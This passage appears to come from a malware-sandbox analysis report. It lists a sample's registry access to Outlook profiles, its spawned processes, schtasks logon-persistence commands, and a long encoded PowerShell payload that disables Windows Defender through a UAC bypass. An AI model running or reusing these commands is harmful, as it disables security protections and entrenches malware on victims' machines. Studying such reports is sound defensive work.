| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe
"C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\Infected.exe
"C:\Users\Admin\AppData\Local\Temp\Infected.exe"
C:\Users\Admin\AppData\Local\Temp\WinDefend.exe
"C:\Users\Admin\AppData\Local\Temp\WinDefend.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5738.tmp.bat""
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5851.tmp.bat""
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\Admin\AppData\Roaming\Loader.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\Admin\AppData\Roaming\Loaader.exe"'
C:\Users\Admin\AppData\Roaming\Loader.exe
"C:\Users\Admin\AppData\Roaming\Loader.exe"
C:\Users\Admin\AppData\Roaming\Loaader.exe
"C:\Users\Admin\AppData\Roaming\Loaader.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA==
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAF